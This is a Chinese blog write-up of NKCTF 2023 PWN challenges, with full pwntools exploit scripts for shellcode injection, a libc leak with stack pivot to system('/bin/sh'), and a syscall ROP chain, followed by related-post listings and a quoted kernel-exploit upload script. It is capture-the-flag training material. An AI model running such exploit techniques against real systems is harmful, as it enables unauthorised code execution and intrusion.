NKCTF PWN wp

原创 已于 2023-03-30 11:20:03 修改 · 756 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #ubuntu #安全

于 2023-03-30 10:17:50 首次发布
本文详细介绍了在CTF比赛中解决PWN类问题的经验,涉及ezshellcode、栈迁移、ROP利用、堆溢出和libc地址泄露等技术。通过案例分析,阐述了如何利用缓冲区溢出、格式化字符串漏洞、堆布局操纵等方法实现系统权限提升。

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

ezshellcode

填充nop抵消随机滑行到shellcode

#!usr/bin/env python 
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 1
if DEBUG:
    gdbOpen = 1
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./pwn')
else:
    gdbOpen = 0
    ip = 'node.yuzhian.com.cn'
    port = 38867
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    if gdbOpen == 1:
        gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x)")


debug("b *0x00000000004012F1")
shellcode = p8(0x90) * 104 + asm(shellcraft.sh()) 
p.sendafter("in 5 min!\n", shellcode)

p.interactive()

a_story_of_a_pwner

栈迁移然后刚好够弹一个参数执行system

#!usr/bin/env python 
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 0
if DEBUG:
    gdbOpen = 1
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    libc = ELF("./libc.so.6")
    p = process('./pwn')
else:
    gdbOpen = 0
    ip = 'node2.yuzhian.com.cn'
    port = 33627 
    libc = ELF("./libc.so.6")
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    if gdbOpen == 1:
        gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x)")


def choose(choice):
    p.sendlineafter(b"> \n", str(choice).encode('ascii'))

pop_rdi = 0x0000000000401573
leave_ret = 0x000000000040139E
debug("b *0x000000000040139F")
choose(4)
p.recvuntil(b'0x')
leak = int(p.recv(12), 16) - 0x84420
log.info("libc_base==>0x%x" %leak)
sys = leak + libc.sym['system']
binsh = leak + next(libc.search(b'/bin/sh'))
choose(1)
p.sendafter(b'comment?\n', p64(binsh))
choose(2)
p.sendafter(b'corment?\n', p64(pop_rdi))
choose(3)
p.sendafter(b'corMenT?\n', p64(sys))
choose(4)
payload = b'a'*0xa + p64(0x0000000000405098) + p64(leave_ret)
p.sendafter(b'heart...\n', payload)

p.interactive()

ez_stack

程序内直接就能找到syscall的gadget,使用其即可,注意的地方就是csu调用的时候是个指针,所以要把这个地址写入bss上才能正常使用

#!usr/bin/env python 
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./ez_stack')
DEBUG = 0
if DEBUG:
    gdbOpen = 1
    libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
    ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so")
    p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    #p = process('./ez_stack')
else:
    gdbOpen = 0
    ip = 'node2.yuzhian.com.cn'
    port = 35211 
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    if gdbOpen == 1:
        gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x)")

pop_rdi = 0x0000000000401283
pop_rsi = 0x0000000000401281 # pop rsi ; pop r15 ; ret
syscall = 0x000000000040114e
csu1 = 0x000000000040127A
csu2 = 0x0000000000401260

debug("b *0x00000000004011F6")
payload = b'a'*0x18 + p64(pop_rsi) + p64(0x4040B0)*2 + p64(syscall)
payload += p64(csu1)
最低0.47元/天 解锁文章
NKCTF--pwn--Maimai查分器
fuiifiuiii的博客
03-25 779
怀疑可能远程的内部程序偏移不同,用-1到-8,+1到+8试,结果到+4的时候,欸?(后来发现是第二个payload里的4个A给输进去了,不知道为什么我本地不会这么输进去,远程却会()不过当时确实应该好好看看打印出来的东西,确实多了4个A)转换思路:栈溢出后自行用一个read,设置特别大的字节,由于想用orw嘛,就泄露了栈的地址,同时也可以作为这个read的地址。(不知道是不是修复了还是我的问题)没加是因为我本地之前正常不用+,然后本地调完忘了改,现在突然发现。好吧好吧,总算是做出来一个,没被零封()()
NKCTF2023 pwn wp
S4n_v1的博客
03-31 990
NKCTF2023 pwn....
NKCTF_WP
m0_73954357的博客
03-27 757
aa
2023NKCTF PWN
m0_63437215的博客
03-28 1197
2023NKCTF
NKCTF pwn方向wp
maple105890的博客
03-27 613
然后放堆快指针的附近有malloc_context+0x18的地址,里面有很多dirty_data,而且got表可写,泄露出来打free函数。然后发现二次输入能直接把rbp末尾覆盖成\x00,那就在栈中构造rop链就好了。所以考虑和ez_stack一样的做法,比爆破ogg快多了。虽然给了libc,但构造了⼀下shellcode也能出。存在格式化字符串漏洞,先把cananry泄露出来。给了libc,可以光明正大偷鸡了bushi。直接rand搞一下就出了,连爆破都不用。和西湖那题有一点像,但那题还要抬栈。
ctfshow pwn wp
Chandra的学习之路
11-26 1209
mov eax,[esi]:将esi中的值作为地址(080490E8地址单元中的值,eax只能读取4个字节的内容,读取一个字符Ascii码即1个字节),然后将该地址单元的值赋给eax,我们在ida可以查看080490E8地址单元的值(Welc倒序的ascii码)。根据题目要求,直接查看寄存器寻址方式的内容,可以得到edx的值为0x36d,根据之前某题大写提示,改成0x36D,即:ctfshow{0x36D}mov esi,msg:将msg的地址赋给esi,此时esi寄存器中的值为080490E8;
[NKCTF2024]-PWN:来签个到(windows pwn
2301_79326813的博客
03-27 406
查看保护查看ida实际上是有canary的。
2024NKCTF-pwn
03-25
2024NKCTF_pwn
NKCTF 2023-misc全解(有脚本,有详解)
路baby的博客
03-29 4376
前几天打了nkctf ,因为自己也是主打misc,顺便也复现一遍,一点自己的拙见,各位师傅见笑了
NKCTF2023 web wp
adorkablezhenbai的博客
03-27 1250
web新手签到NKCTF,简单记录两个签到题。
2023NKCTF Writeup——W4ntY0u.
weixin_52365980的博客
03-27 4648
NKCTF2023是由N0wayBack战队举办。本次比赛采用线上网络安全技能大赛实践赛的形式,覆盖Web、Reverse、Pwn、Misc、Crypto、SocialEngineering等主流赛题方向,面向国内所有个体及团队 除了梦想外我们一无所有,将会和蔑视与困境做最后的斗争,这是最后一舞
NKCTF 2024(三月周报比赛一)
NYG694的博客
03-25 1168
常规思路原本是格式化泄露壳和libc,然后进行构造system/bin/sh来getshell,但是发现没有权限,只能通过orw来读取flag,并且因为栈空间不够需要构造栈迁移来。扫目录找到管理员界面登陆,账号Admin,密码Admin123,账号可以根据forget来进行查询是否存在,然后进行弱密码攻击,这里网上有两种rce,一种sstl一种代码执行。进去就是一个登录界面,根据提示tacooooo@qq.com,先尝试暴力破解密码,发现不行,测试tacooooo,成功。拿大佬的换下box就可以了。
[NKCTF2023]web/misc/blockchain-wp
qq_63923205的博客
03-27 1429
NKCTF WP
NKCTF-2023-RE-Baby_rust
qq_54894802的博客
03-31 824
简单的rust逆向
2023 NKCTF --- Crypto ezRSA wp
3tefanie的博客
03-28 1424
【世间情种偏好伤心事,苦中作乐,乐在其中,不伤心又如何算得上痴情人。】
NKCTF2024-Eznative
qq_24481913的博客
03-25 803
看到上层函数,其实这个sub_27F2d4是有符号的,我这里写wp的时候没有导入全部,名字叫做dialog,那么写过安卓开发的就知道这玩意就是弹窗了。然后在之前给出的GitHub项目中,发现其实他的enc出来的结果就是base64的,所以我们直接使用库就可以解密了。在old中也是有符号的,很明显的base。这里有个巨jb坑的地方,我点了n次一直不触发,后面来脾气了,长按一下,结果。短按是用来触发aaa的,当时hook过aaa,发现短按确实能触发。触发了,tnnd,后面发现应该是这个aaa与bbb的问题。
nkctf逆向(re)PMKF复现
m0_75098930的博客
03-29 820
具体有三个文件读取,这里有个小tips,他读的是C盘,如果没以管理员身份运行,可能会打不开,我不想以管理员身份运行,就直接将C patch 成 D,D盘开文件限制就小了。将其读取的字节,每两位与3进行与运算,也就是说,读取的16个字符实际是每两位判断一次,共64次,对照上面的迷宫步骤,刚好是64位。并按位异或0x15(v8的值),写入nk.ctf文件。第一个判断,也就是nk.ctf读取的第一个是0x5。第二个判断,nk.ctf读取的是“nkman”第三个判断,也就是走迷宫的判断,先画出迷宫图。
NKCTF
m0_73725283的博客
04-02 536
GGH这个东西真不懂(有关格,等我后面恶补一下),看了wp才知道可以直接爆破delta就可以得到答案。答案:nkctf{G0od_Y0u_Ar3_Kn0W_Ggh_Crypt0syst3m!答案:nkctf{cb5b7392-cca4-4ce2-87e7-930cf6b29959}因为delta不大于20,很小,完全可以爆破出来。python(把公钥转矩阵)
NKCTF-web(记一次越权)
jiyi_guoshu的博客
03-14 2921
这里写自定义目录标题题目如下进入网页,发现是一个登陆框,先注册一个账户点击登陆,发现网站返回的是一串字符,并且暗示我们要去注册admin账户。尝试注册admin为用户名的账户,网页提示用户名已被注册。 题目如下 进入网页,发现是一个登陆框,先注册一个账户 点击登陆,发现网站返回的是一串字符,并且暗示我们要去注册admin账户。 尝试注册admin为用户名的账户,网页提示用户名已被注册。 ...
ctfshow-pwnwp
最新发布
09-17
CTFShow平台PWN题的解题思路和过程在不同题目中有所不同。以CTFSHOW PWN02为例,解题脚本通过`pwn`库进行操作。脚本根据`contect`变量的值来选择是本地运行程序还是远程连接目标服务器。构造了长度为13个字节的`a`字符的`payload`,并拼接上函数地址`0X804850F`,将其发送给目标程序,最后进入交互模式与程序进行交互,可能是通过溢出覆盖返回地址来执行指定函数,以达到解题目的[^1]。 对于CTFShow PWN入门的Kernel PWN 356 - 360相关题目,解题脚本先将本地的`exp`文件内容进行Base64编码,然后分块发送到远程服务器上的`/tmp/b64_exp`文件中。接着将Base64编码的内容解码成可执行文件`/tmp/exploit`,为其添加执行权限,最后执行该文件并进入交互模式。该过程可能是利用内核漏洞,通过上传并执行本地编写的漏洞利用脚本,来获取远程服务器的控制权[^3]。 ### 代码示例 CTFSHOW PWN02解题脚本: ```python from pwn import * contect = 1 def main(): if contect == 0: p = process("./stack") else: p = remote("pwn.challenge.ctf.show", 28103) payload = b'a' * 13 payload += p32(0X804850F) p.sendline(payload) p.interactive() main() ``` CTFShow PWN入门Kernel PWN相关题目的解题脚本: ```python from pwn import * import base64 context.log_level = "debug" with open("./exp", "rb") as f: exp = base64.b64encode(f.read()) p = remote("pwn.challenge.ctf.show", 28304) p.recvuntil(b"$ ") p.sendline(b"ls") count = 0 for i in range(0, len(exp), 0x200): p.recvuntil(b"/ $ ") p.sendline("echo -n \"" + exp[i:i + 0x200].decode() + "\" >> /tmp/b64_exp") count += 1 log.info("count: " + str(count)) p.sendline("cat /tmp/b64_exp | base64 -d > /tmp/exploit") p.sendline("chmod +x /tmp/exploit") p.sendline("/tmp/exploit ") p.interactive() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ShouCheng3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值